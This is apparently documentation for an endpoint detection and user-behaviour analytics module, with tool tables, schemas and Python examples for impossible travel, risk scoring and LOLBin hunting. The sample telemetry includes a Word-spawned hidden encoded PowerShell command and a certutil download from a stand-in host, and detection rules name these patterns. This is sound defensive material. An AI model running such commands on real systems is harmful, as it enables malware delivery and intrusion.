Endpoint Security
Purpose
Unified endpoint detection + user/entity behaviour analytics: process tree analysis, persistence mechanisms, memory forensics, behavioural baselines, insider-threat scoring, impossible-travel detection, and peer-group deviation.
MCP Domains
| Domain | Description |
|---|---|
| ueba | User/entity behavioural baselines, anomaly scoring |
| edr | Endpoint telemetry, process analysis |
| siem | Log search, event correlation |
| malware | YARA scanning integration |
Tools
| Tool | Description |
|---|---|
| isolate_endpoint | Network isolation of endpoint |
| scan_endpoint | Trigger endpoint scan |
| search_logs | Query SIEM for endpoint events |
| correlate_events | Cross-reference endpoint events |
| hunt_lolbins | LOLBin detection on endpoints |
| baseline_deviation | Detect deviation from user/entity baseline |
| user_risk_score | Calculate composite user risk score |
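The `baseline_deviation`, impossible-travel and `user_risk_score` steps above, shown as an added example in Python that is not the module's own code. The 14-day download baseline and the three login events are constructed; the z-score threshold, the plausible-speed limit, the way travel speed is folded into `deviation_zscore`, the risk-combination formula and the ATT&CK mapping are all this example's assumptions, not values the page specifies.

```python
"""UEBA helpers: z-score baseline deviation, impossible travel, composite risk.
Added example; sample data is constructed and thresholds are assumptions."""
import math
import statistics
from datetime import datetime

# Constructed baseline: file downloads per day for one user over 14 days.
BASELINE_DOWNLOADS = [12, 15, 9, 14, 11, 13, 10, 12, 16, 11, 13, 12, 14, 10]

# Constructed logins for one user: (ISO8601 timestamp, city, latitude, longitude).
LOGINS = [
    ("2024-05-01T08:02:00Z", "London", 51.5074, -0.1278),
    ("2024-05-01T08:47:00Z", "Singapore", 1.3521, 103.8198),
    ("2024-05-02T09:15:00Z", "London", 51.5074, -0.1278),
]

ZSCORE_THRESHOLD = 3.0      # assumption: flag anything beyond 3 sigma
MAX_PLAUSIBLE_KMH = 1000.0  # assumption: roughly airliner cruise speed


def parse_ts(ts: str) -> datetime:
    """Parse ISO8601; the trailing Z is rewritten so fromisoformat accepts it."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def zscore(value: float, baseline: list) -> float:
    """Population z-score of value against the baseline sample."""
    mu, sigma = statistics.fmean(baseline), statistics.pstdev(baseline)
    if sigma == 0.0:  # flat baseline: any change at all is infinitely unusual
        return 0.0 if value == mu else math.inf
    return (value - mu) / sigma


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance in km between two points (mean Earth radius 6371 km)."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def baseline_deviation(value: float, baseline: list, metric: str) -> list:
    """One anomaly record if value lies beyond ZSCORE_THRESHOLD, else an empty list."""
    z = zscore(value, baseline)
    if abs(z) < ZSCORE_THRESHOLD:
        return []
    return [{"type": "baseline_deviation",
             "description": f"{metric}={value} vs baseline mean {statistics.fmean(baseline):.1f}",
             "deviation_zscore": z}]


def impossible_travel(logins: list) -> list:
    """Flag consecutive logins whose implied speed exceeds MAX_PLAUSIBLE_KMH.
    Travel has no statistical baseline, so (assumption) deviation_zscore carries
    the ratio of implied speed to the limit instead of a true sigma count."""
    out = []
    ordered = sorted(logins, key=lambda e: parse_ts(e[0]))
    for (t0, c0, la0, lo0), (t1, c1, la1, lo1) in zip(ordered, ordered[1:]):
        km = haversine_km(la0, lo0, la1, lo1)
        hours = (parse_ts(t1) - parse_ts(t0)).total_seconds() / 3600.0
        if hours > 0:
            speed = km / hours
        else:  # zero elapsed time (clock skew, replayed token): any distance is impossible
            speed = math.inf if km > 0 else 0.0
        if speed > MAX_PLAUSIBLE_KMH:
            out.append({"type": "impossible_travel",
                        "description": f"{c0} -> {c1}: {km:.0f} km in {hours:.2f} h ({speed:.0f} km/h)",
                        "deviation_zscore": speed / MAX_PLAUSIBLE_KMH,
                        "speed_kmh": speed})
    return out


def user_risk_score(anomalies: list) -> float:
    """Composite 0..1 score (assumption): each anomaly contributes 1-exp(-z/threshold)
    and the contributions combine like independent probabilities."""
    survive = 1.0
    for a in anomalies:
        z = min(abs(a["deviation_zscore"]), 1e6)  # keep inf out of exp()
        survive *= math.exp(-z / ZSCORE_THRESHOLD)
    return 1.0 - survive


def analyze_entity(entity_id: str, downloads_today: float, logins: list) -> dict:
    """Assemble the ueba part of the output schema for one entity."""
    anomalies = baseline_deviation(downloads_today, BASELINE_DOWNLOADS, "downloads")
    anomalies += impossible_travel(logins)
    techniques = []
    if any(a["type"] == "impossible_travel" for a in anomalies):
        techniques.append("T1078")  # Valid Accounts (assumed mapping)
    if any(a["type"] == "baseline_deviation" for a in anomalies):
        techniques.append("T1039")  # Data from Network Shared Drive (assumed mapping)
    risk = user_risk_score(anomalies)
    actions = ["revoke_sessions", "require_mfa_reenrolment"] if risk >= 0.8 else ["monitor"]
    return {"entity_id": entity_id, "risk_score": risk, "behavioral_anomalies": anomalies,
            "mitre_techniques": techniques, "recommended_response_actions": actions}


if __name__ == "__main__":
    print(analyze_entity("user-42", 40, LOGINS))
```

With the constructed data, 40 downloads against a baseline with mean 12.3 and sigma 1.9 scores around z = 14, and the London to Singapore pair 45 minutes apart implies well over 10,000 km/h, so both anomalies land in the record and the composite risk is close to 1.0; the later Singapore to London login a day afterwards stays under the limit and is not flagged.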
Input schema
```json
{
  "entity_id": "string",
  "endpoint_id": "string",
  "analysis_type": "edr | ueba | both",
  "time_range": {"start": "ISO8601", "end": "ISO8601"}
}
```
Output schema
```json
{
  "entity_id": "string",
  "risk_score": "float",
  "endpoint_id": "string",
  "threat_indicators": ["string"],
  "behavioral_anomalies": [
    {
      "type": "string",
      "description": "string",
      "deviation_zscore": "float"
    }
  ],
  "process_tree": {
    "pid": "int",
    "name": "string",
    "children": []
  },
  "mitre_techniques": ["string"],
  "recommended_response_actions": ["string"],
  "investigation_timeline": [
    {"timestamp": "ISO8601", "event": "string"}
  ]
}
```
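The edr side of the output schema (`process_tree`, `threat_indicators`, `mitre_techniques`) together with the `hunt_lolbins` tool, shown as an added example in Python that is not the module's own code. The six process-creation events are constructed; the Office-parent and LOLBin lists, the three detection rules, the binary-to-technique mapping and the response actions it recommends are this example's assumptions.

```python
"""EDR helpers: process-tree nesting and LOLBin lineage/argument hunting.
Added example; the telemetry is constructed and the rules are assumptions."""
from collections import defaultdict

# Constructed process-creation telemetry for one endpoint.
EVENTS = [
    {"pid": 4,   "ppid": 0,   "name": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 120, "ppid": 4,   "name": "winword.exe",    "cmdline": "winword.exe invoice.docm"},
    {"pid": 133, "ppid": 120, "name": "cmd.exe",        "cmdline": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"},
    {"pid": 140, "ppid": 133, "name": "powershell.exe", "cmdline": "powershell -nop -w hidden -enc SQBFAFgA"},
    {"pid": 150, "ppid": 140, "name": "certutil.exe",   "cmdline": "certutil -urlcache -split -f http://example.invalid/a.dll a.dll"},
    {"pid": 200, "ppid": 4,   "name": "chrome.exe",     "cmdline": "chrome.exe"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Assumed binary-to-ATT&CK mapping used to fill mitre_techniques.
TECHNIQUE = {"powershell.exe": "T1059.001", "cmd.exe": "T1059.003",
             "wscript.exe": "T1059.005", "cscript.exe": "T1059.005",
             "mshta.exe": "T1218.005", "rundll32.exe": "T1218.011",
             "regsvr32.exe": "T1218.010", "certutil.exe": "T1105",
             "bitsadmin.exe": "T1197"}


def build_process_tree(events: list, root_pid: int) -> dict:
    """Nest events into the schema's {pid, name, children} shape under root_pid."""
    by_pid = {e["pid"]: e for e in events}
    kids = defaultdict(list)
    for e in events:
        kids[e["ppid"]].append(e["pid"])
    seen = set()

    def node(pid):
        seen.add(pid)  # pid reuse can make the ppid graph cyclic; never revisit
        return {"pid": pid, "name": by_pid[pid]["name"],
                "children": [node(c) for c in sorted(kids[pid]) if c not in seen]}
    return node(root_pid)


def office_ancestor(e: dict, by_pid: dict):
    """Walk up the ppid chain and return the first Office process, if any."""
    seen, p = set(), by_pid.get(e["ppid"])
    while p and p["pid"] not in seen:
        if p["name"].lower() in OFFICE:
            return p
        seen.add(p["pid"])
        p = by_pid.get(p["ppid"])
    return None


def hunt_lolbins(events: list):
    """Return (threat_indicators, mitre_techniques) for suspicious lineage or arguments."""
    by_pid = {e["pid"]: e for e in events}
    indicators, techniques = [], []

    def hit(msg, name):
        indicators.append(msg)
        t = TECHNIQUE.get(name)
        if t and t not in techniques:
            techniques.append(t)

    for e in events:
        name, args = e["name"].lower(), e["cmdline"].lower()
        anc = office_ancestor(e, by_pid)
        if name in LOLBINS and anc:  # rule 1: LOLBin anywhere beneath an Office process
            hit(f"{name} (pid {e['pid']}) descends from {anc['name']} (pid {anc['pid']})", name)
        if name == "powershell.exe" and ("-enc" in args or "-w hidden" in args):
            hit(f"powershell.exe (pid {e['pid']}) launched encoded or hidden", name)  # rule 2
        if name == "certutil.exe" and "-urlcache" in args:
            hit(f"certutil.exe (pid {e['pid']}) used for download", name)  # rule 3
    return indicators, techniques


def analyze_endpoint(endpoint_id: str, events: list, root_pid: int) -> dict:
    """Assemble the edr part of the output schema for one endpoint."""
    indicators, techniques = hunt_lolbins(events)
    # Tool names here are the ones listed on this page; choosing them is an assumption.
    actions = ["isolate_endpoint", "scan_endpoint"] if indicators else ["scan_endpoint"]
    return {"endpoint_id": endpoint_id, "threat_indicators": indicators,
            "mitre_techniques": techniques, "process_tree": build_process_tree(events, root_pid),
            "recommended_response_actions": actions}


if __name__ == "__main__":
    print(analyze_endpoint("host-01", EVENTS, 4))
```

Rule 1 walks the whole lineage rather than checking only the immediate parent, so the powershell.exe and certutil.exe that winword.exe reaches via cmd.exe are still attributed to the document; the cycle guards in both walkers matter on real telemetry, where a reused pid can make a process appear to be its own ancestor.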
Memory config
| Parameter | Value |
|---|---|
| sliding_window | 40 |
| enable_episodic | true |
| enable_threat_intel | true |
| auto_persist_interval | 15 |
Allow-list
ueba, edr, siem, malware